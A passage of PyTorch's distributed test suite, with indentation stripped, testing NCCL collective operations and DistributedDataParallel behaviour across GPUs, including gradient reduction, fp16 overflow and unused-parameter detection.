for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class DistributedDataParallelTest(MultiProcessTestCase):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertTrue(ddp_logging_data.is_multi_device_module)
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertFalse(ddp_logging_data.is_multi_device_module)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _test_gloo_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_gloo()
def test_gloo_backend_cpu_module(self):
self._test_gloo_backend([torch.device("cpu")], None)
@requires_gloo()
def test_gloo_backend_cpu_module_grad_is_view(self):
self._test_gloo_backend([torch.device("cpu")], None, gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, int_devices)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, devices)
@requires_gloo()
@skip_if_lt_x_gpu(4)
def test_gloo_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
@requires_gloo()
@skip_if_lt_x_gpu(8)
def test_gloo_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}"
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(
recurse=False
):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_global_local_unused_params_grad(self, gradient_as_bucket_view=False):
"""
By simulating a multi-task training, this test is to make sure:
1) DDP does not touch the grad of globally unused parameters.
2) DDP does update the grad of locally unused parameters.
"""
class GlobalLocalUnusedParamModule(nn.Module):
def __init__(self):
super(GlobalLocalUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
self.task_unused = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p, self.task_unused.p)
def forward(self, x, rank):
return self.t0(x) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
t0_p, t1_p, task_unused_p = model.module.task_parameters()
self.assertIsNone(t0_p.grad)
self.assertIsNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
# Run backward
output.mean().backward()
# Now locally unused parameter should have grad updated on all ranks.
# However the globally unused parameter should still have None grad.
self.assertIsNotNone(t0_p.grad)
self.assertIsNotNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(gpu_model)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad(self):
self._test_global_local_unused_params_grad()
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad_with_grad_is_view(self):
self._test_global_local_unused_params_grad(gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_when_unused_parameters_empty(self):
"""
An empty unused_parameters array does not imply find_unused_parameters =
false. This test makes sure that DDP allreduces unused parameters
accordingly where the forward pass in some process uses all parameters.
This unit test creates a module that uses all parameters in rank = 0, and
has unused parameters in other ranks.
"""
class FindUnusedParamModule(nn.Module):
def __init__(self):
super(FindUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p)
def forward(self, x, rank):
return self.t1(self.t0(x)) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
[self.assertIsNone(t_p.grad) for t_p in model.module.task_parameters()]
# Run backward
output.mean().backward()
# Now locally unused parameter should have grad updated on all ranks.
[self.assertIsNotNone(t_p.grad) for t_p in model.module.task_parameters()]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
FindUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
FindUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(gpu_model)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
